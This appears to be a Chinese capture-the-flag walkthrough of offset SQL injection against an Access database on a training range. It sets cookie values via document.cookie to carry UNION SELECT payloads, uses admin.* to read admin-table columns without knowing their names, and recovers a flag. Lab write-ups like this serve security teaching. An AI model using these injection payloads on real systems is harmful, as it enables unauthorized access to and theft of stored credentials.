[zkaq靶场]SQL注入--access数据库-偏移注入

Access注入–偏移注入

适用场景:

当使用select * from adminselect admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。

union select 1,2,3,admin.* ,4,5,6 from admin

通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。

靶场

image-20210423190308583

该处的sql注入为access数据库-cookie注入的漏洞点。

偏移注入的漏洞点在:

image-20210423190446845

由于admin表里新增了一个字段,无法通过爆破得出,所以在此处我们使用偏移注入。

判断列数

通过order by 判断出有26个字段

image-20210423190847980

并且也是cookie注入,在url不允许传入非法字符。

判断回显点:

document.cookie=‘id=’+escape(“105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin”)

image-20210423193926582

此处明显的回显点是3,5,7,但是通过查看页面源代码发现还要25的回显点。

image-20210423194121773

所以回显点一共是3,5,7,25。

然后判断admin.*的列数。

url:http://59.63.200.79:8004/ProductShow.asp?

document.cookie=‘id=’+escape(“105 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin.* from admin”)

页面不正常:

image-20210423195842422

document.cookie=‘id=’+escape(“105 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin”)

页面正常,可以判断admin表有16个字段。

document.cookie=‘id=’+escape(“105 and 1=2 union select 1,2,3,4,5,6,7,8,9,admin.*,10 from admin”):获得最后admin表最后一个字段的数据,因为25是回显点。

image-20210423200139802

得到flag。zkaq{f0e12dafb6}

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值